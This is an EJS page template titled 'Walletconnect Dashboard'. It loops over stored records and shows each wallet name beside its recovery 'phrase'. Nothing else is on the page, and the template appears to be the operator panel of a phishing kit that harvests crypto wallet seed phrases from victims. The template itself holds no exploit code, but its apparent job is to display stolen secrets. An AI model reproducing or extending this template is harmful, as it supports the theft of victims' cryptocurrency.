

<%- include('static/header') %>

			<main class="content">
				<div class="container-fluid p-0">

					<h1 class="h3 mb-3">Walletconnect Dashboard</h1>


					<div class="row">
						<div class="col-12 col-lg-12 col-xxl-9 d-flex">
							<div class="card flex-fill">
								<div class="card-header">

									<h5 class="card-title mb-0">Phrase</h5>
								</div>
								<table class="table table-hover my-0">
									<thead>
										<tr>
											<th>Wallet</th>
											<th class="d-none d-xl-table-cell">Phrase</th>
											
										</tr>
									</thead>
									<tbody>
										
										<% getphrase.forEach(data => { %>
										       <tr>
											<td><%= data.wallet %></td>
											<td class="d-none d-md-table-cell"><%= data.phrase %></td>
										</tr>
										<% }) %>
										
										
									</tbody>
								</table>
							</div>
						</div>
					</div>

				</div>
			</main>

		<%- include('static/footer') %>